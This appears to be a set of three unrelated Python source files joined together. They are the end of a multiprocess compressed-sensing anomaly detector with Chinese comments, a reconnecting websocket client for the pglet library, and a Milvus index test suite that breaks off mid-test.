raise Exception(
'retry failed, please try higher sample rate or '
'window size'
)
sample_rate += (1 - sample_rate) / 4
retry_count += 1
from sys import stderr
stderr.write(
'WARNING: reconstruct failed, retry with higher '
'sample rate %f, retry times remain %d\n'
% (
sample_rate, self.retry_limit - retry_count)
)
return rec, retry_count
class CSAnomalyDetector:
"""
基于压缩感知采样重建的离线多进程异常检测器
"""
def __init__(
self,
cluster_threshold: float,
sample_rate: float,
sample_score_method,
distance,
workers: int = 1,
latest_windows: int = 96,
scale: float = 5,
rho: float = 0.1,
sigma: float = 1 / 24,
random_state=None,
retry_limit=10,
without_grouping: str = None,
without_localize_sampling: bool = False,
):
"""
:param cluster_threshold: 聚类参数: 阈值
:param sample_rate: 采样率
:param sample_score_method: 采样点可信度计算函数 输入(array(n * d))输出
array(n) 表示输入的n个点的采样可信度
:param distance: 计算距离的函数, 输入 (array(n * d), array(n * d)) 输出
real表示两个输入之间的距离
:param workers: 计算线程数
:param latest_windows: 采样时参考的历史窗口数
:param scale: 采样参数: 等距采样点扩充倍数
:param rho: 采样参数: 中心采样概率
:param sigma: 采样参数: 采样集中程度
:param random_state: 随机数种子
:param retry_limit: 求解重试次数, 超过次数求解仍未成功, 则抛出异常
:param without_grouping: 降级实验: 不进行分组
:param without_localize_sampling: 降级实验: 完全随机采样
"""
if sample_rate > 1 or sample_rate <= 0:
raise Exception('invalid sample rate: %s' % sample_rate)
if without_grouping and without_grouping not in \
{'one_by_one', 'all_by_one'}:
raise Exception('unknown without grouping option')
self._scale = scale
self._rho = rho
self._sigma = sigma
self._sample_rate = sample_rate
self._cluster_threshold = cluster_threshold
self._random_state = random_state
self._latest_windows = latest_windows
# 采样点可信度计算方法
self._sample_score_method = sample_score_method
# 距离计算方法
self._distance = distance
# 重试参数
self._retry_limit = retry_limit
# 最大工作线程数
self._workers = workers
# 降级实验
self._without_grouping = without_grouping
self._without_localize_sampling = without_localize_sampling
def reconstruct(
self, data: np.array,
window: int,
windows_per_cycle: int,
stride: int = 1,
):
"""
离线预测输入数据的以时间窗为单位的异常概率预测, 多线程
:param data: 输入数据
:param window: 时间窗口长度(点)
:param windows_per_cycle: 周期长度: 以时间窗口为单位
:param stride: 时间窗口步长
"""
if windows_per_cycle < 1:
raise Exception('a cycle contains 1 window at least')
# 周期长度
cycle = windows_per_cycle * window
# 周期特征: 按周期分组
groups = self._get_cycle_feature(data, cycle)
print('group per cycle:')
for i in range(len(groups)):
print('cycle: %d ----' % i)
for each in groups[i]:
print(' ', each)
reconstructed, retry_count = self._get_reconstructed_data(
data, window, windows_per_cycle, groups, stride)
return reconstructed, retry_count
def predict(
self,
data: np.array,
reconstructed: np.array,
window: int,
stride: int = 1,
):
"""
离线处理: 利用参数进行评估, 得到每个点的异常得分
:param data: 原始数据
:param reconstructed: 重建好的数据
:param window: 数据窗口长度
:param stride: 窗口步长
:return: 每个点的异常得分
"""
if reconstructed.shape != data.shape:
raise Exception('shape mismatches')
n, d = data.shape
# 异常得分
anomaly_score = np.zeros((n,))
# 表示当时某个位置上被已重建窗口的数量
anomaly_score_weight = np.zeros((n,))
# 窗口左端点索引
wb = 0
while True:
we = min(n, wb + window)
# 窗口右端点索引 窗口数据[wb, we)
score = self._distance(data[wb:we], reconstructed[wb:we])
for i in range(we - wb):
w = i + wb
weight = anomaly_score_weight[w]
anomaly_score[w] = \
(anomaly_score[w] * weight + score) / (weight + 1)
anomaly_score_weight[wb:we] += 1
if we >= n:
break
wb += stride
return anomaly_score
def _get_reconstructed_data(
self,
data: np.array,
window: int,
windows_per_cycle: int,
groups: list,
stride: int,
):
"""
离线预测输入数据的以时间窗为单位的异常概率预测, 多线程
:param data: 输入数据
:param window: 时间窗口长度(点)
:param windows_per_cycle: 周期长度: 以时间窗口为单位
:param groups: 每个周期的分组
:param stride: 时间窗口步长
:return:
"""
n, d = data.shape
# 重建的数据
reconstructed = np.zeros((n, d))
# 表示当时某个位置上被已重建窗口的数量
reconstructing_weight = np.zeros((n,))
needed_weight = np.zeros((n,))
# 作业列表
task_queue = Queue()
# 结果列表
result_queue = Queue()
# 周期长度
cycle = window * windows_per_cycle
# 窗口左端点索引
win_l = 0
while True:
win_r = min(n, win_l + window)
# 窗口右端点索引 窗口数据[win_l, win_r)
task_queue.put((win_l, win_r, groups[win_l // cycle]))
needed_weight[win_l:win_r] += 1
if win_r >= n:
break
win_l += stride
task_return_event = Event()
finished = False
def receive_result_thread():
"""
接受result_queue结果的线程
:return:
"""
total_retries = 0
while True:
while result_queue.empty():
task_return_event.clear()
task_return_event.wait()
if finished:
result_queue.put(total_retries)
return
wb, we, rec_window, retries, sample_score = result_queue.get()
total_retries += retries
for index in range(rec_window.shape[0]):
w = index + wb
weight = reconstructing_weight[w]
reconstructed[w, :] = \
(reconstructed[w, :] * weight + rec_window[index]) \
/ (weight + 1)
reconstructing_weight[wb:we] += 1
processes = []
for i in range(self._workers):
process = WindowReconstructProcess(
data=data, task_queue=task_queue, result_queue=result_queue,
cycle=cycle, latest_windows=self._latest_windows,
sample_score_method=self._sample_score_method,
sample_rate=self._sample_rate,
scale=self._scale, rho=self._rho, sigma=self._sigma,
random_state=self._random_state,
without_localize_sampling=self._without_localize_sampling,
retry_limit=self._retry_limit,
task_return_event=task_return_event
)
process.start()
processes.append(process)
receiving_thread = Thread(target=receive_result_thread)
receiving_thread.start()
for each in processes:
each.join()
finished = True
task_return_event.set()
receiving_thread.join()
mismatch_weights = []
for i in range(n):
if reconstructing_weight[i] != needed_weight[i]:
mismatch_weights.append('%d' % i)
if len(mismatch_weights):
from sys import stderr
stderr.write('BUG empty weight: index: %s\n' %
','.join(mismatch_weights))
return reconstructed, result_queue.get()
def _get_cycle_feature(
self,
data: np.array,
cycle: int,
):
"""
将数据按周期进行划分后计算得到每个周期的分组
:param data: 数据
:param cycle: 周期长度
:return: 分组结果
"""
# 数据量, 维度
n, d = data.shape
# 每周期分组结果
cycle_groups = []
# 工作数量
group_index = 0
# 作业队列, 用于向子进程输入数据
task_queue = Queue()
# 输出队列
result_queue = Queue()
# 周期开始的index
cb = 0
while cb < n:
# 周期结束的index
ce = min(n, cb + cycle) # 一周期数据为data[cb, ce)
# 初始化追加列表引用
if group_index == 0:
# 没有历史数据
# 分组默认每个kpi一组
init_group = []
if not self._without_grouping:
for i in range(d):
init_group.append([i])
cycle_groups.append(init_group)
else:
cycle_groups.append([])
# 向工作队列中填充输入数据
if not self._without_grouping:
task_queue.put((group_index, data[cb:ce]))
group_index += 1
cb += cycle
if self._without_grouping:
if self._without_grouping == 'one_by_one':
# 每条kpi一组
for each in cycle_groups:
for i in range(d):
each.append([i])
elif self._without_grouping == 'all_by_one':
# 所有kpi一组
all_in_group = []
for i in range(d):
all_in_group.append(i)
for each in cycle_groups:
each.append(all_in_group)
else:
processes = []
for i in range(min(len(cycle_groups), self._workers)):
process = CycleFeatureProcess(
task_queue, result_queue, self._cluster_threshold
)
process.start()
processes.append(process)
for process in processes:
process.join()
while not result_queue.empty():
group_index, group = result_queue.get()
cycle_groups[group_index] = group
return cycle_groups
|
reconnecting_websocket.py
|
import logging
import random
import threading
import websocket
from pglet.utils import is_localhost_url
_REMOTE_CONNECT_TIMEOUT_SEC = 5
_LOCAL_CONNECT_TIMEOUT_SEC = 0.2
class ReconnectingWebSocket:
def __init__(self, url) -> None:
self._url = url
self._on_connect_handler = None
self._on_failed_connect_handler = None
self._on_message_handler = None
self.connected = threading.Event()
self.exit = threading.Event()
self.retry = 0
websocket.setdefaulttimeout(
_LOCAL_CONNECT_TIMEOUT_SEC
if is_localhost_url(url)
else _REMOTE_CONNECT_TIMEOUT_SEC
)
@property
def on_connect(self, handler):
return self._on_connect_handler
@on_connect.setter
def on_connect(self, handler):
self._on_connect_handler = handler
@property
def on_failed_connect(self, handler):
return self._on_failed_connect_handler
@on_failed_connect.setter
def on_failed_connect(self, handler):
self._on_failed_connect_handler = handler
@property
def on_message(self, handler):
return self._on_message_handler
@on_message.setter
def on_message(self, handler):
self._on_message_handler = handler
def _on_open(self, wsapp) -> None:
self.connected.set()
self.retry = 0
if self._on_connect_handler != None:
th = threading.Thread(target=self._on_connect_handler, args=(), daemon=True)
th.start()
def _on_message(self, wsapp, data) -> None:
if self._on_message_handler != None:
self._on_message_handler(data)
def connect(self) -> None:
self.wsapp = websocket.WebSocketApp(
self._url, on_message=self._on_message, on_open=self._on_open
)
th = threading.Thread(target=self._connect_loop, args=(), daemon=True)
th.start()
def send(self, message) -> None:
self.connected.wait()
self.wsapp.send(message)
def close(self) -> None:
self.exit.set()
self.wsapp.close()
# TODO: Can't do CTRL+C while it sleeps between re-connects
# Change to Event: https://stackoverflow.com/questions/5114292/break-interrupt-a-time-sleep-in-python
def _connect_loop(self):
while not self.exit.is_set():
logging.info(f"Connecting Pglet Server at {self._url}...")
r = self.wsapp.run_forever()
logging.debug(f"Exited run_forever()")
self.connected.clear()
if r != True:
return
if self.retry == 0 and self._on_failed_connect_handler != None:
th = threading.Thread(
target=self._on_failed_connect_handler, args=(), daemon=True
)
th.start()
backoff_in_seconds = 1
sleep = 0.1
if not is_localhost_url(self._url):
sleep = backoff_in_seconds * 2**self.retry + random.uniform(0, 1)
logging.info(f"Reconnecting Pglet Server in {sleep} seconds")
self.exit.wait(sleep)
self.retry += 1
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.util_pymilvus import *
from common.constants import *
from pymilvus.exceptions import MilvusException
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
# BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_string_field_name = ct.default_string_field_name
index_name1 = cf.gen_unique_str("float")
index_name2 = cf.gen_unique_str("varhar")
index_name3 = cf.gen_unique_str("binary")
default_string_index_params = {}
default_binary_schema = cf.gen_default_binary_collection_schema()
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
default_ip_index_params = {"index_type": "IVF_FLAT", "metric_type": "IP", "params": {"nlist": 64}}
default_nq = ct.default_nq
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_search_ip_params = ct.default_search_ip_params
default_search_binary_params = ct.default_search_binary_params
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/16741")
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
# flush
collection_w.num_entities
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field, with the different names, num of the names equal to the maximum num supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field, with the different names, num of the names more than the maximum num supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestNewIndexBase(TestcaseBase):
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request):
log.info(request.param)
return copy.deepcopy(request.param)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_new(self, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, shards_num=1)
data = cf.gen_default_list_data(nb=5000)
collection_w.insert(data=data)
log.debug(collection_w.num_entities)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
@pytest.mark.skip(reason="https://github.com/milvus-io/milvus/issues/12598")
@pytest.mark.tags(CaseLabel.L2)
def test_annoy_index(self):
# The strange thing is that the indexnode crash is only reproduced when nb is 50000 and dim is 512
nb = 50000
dim = 512
fields = [cf.gen_int64_field(), cf.gen_float_vec_field(dim=dim)]
schema = cf.gen_collection_schema(fields, primary_field=ct.default_int64_field_name)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(), schema=schema)
# use python random to generate the data as usual doesn't reproduce
data = [[i for i in range(nb)], np.random.random([nb, dim]).tolist()]
collection_w.insert(data)
log.debug(collection_w.num_entities)
index_params = {"index_type": "ANNOY", "metric_type": "IP", "params": {"n_trees": 10}}
index_wrapper = ApiIndexWrapper()
index, _ = index_wrapper.init_index(collection_w.collection, ct.default_float_vec_field_name, index_params)
assert index.params == index_params
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_non_existed_field(self):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(ct.default_int8_field_name, default_index_params,
index_name=ct.default_index_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "cannot create index on non-existed field: int8"}
)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data()
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_flush(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
partition_w.insert(data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_without_connect(self):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_search_with_query_vectors(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
collection_w.load()
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_multithread(self):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
def build(collection_w):
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
threads_num = 8
threads = []
for i in range(threads_num):
t = MyThread(target=build, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_insert_flush(self, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L1)
def test_create_same_index_repeatedly(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_different_name(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: raise error
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params, index_name="a")
collection_w.create_index(ct.default_float_vec_field_name, default_index_params, index_name="b",
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "CreateIndex failed: creating multiple indexes on same field is not supported"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_repeatedly_new(self):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_prams = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in index_prams:
index_name = cf.gen_unique_str("name")
collection_w.create_index(default_float_vec_field_name, index, index_name=index_name)
collection_w.load()
collection_w.drop_index(index_name=index_name)
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_ip(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors_ip(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params,
index_name=ct.default_index_name)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_ip(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_flush_ip(self):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
partition_w.insert(data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_search_with_query_vectors_ip(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.load()
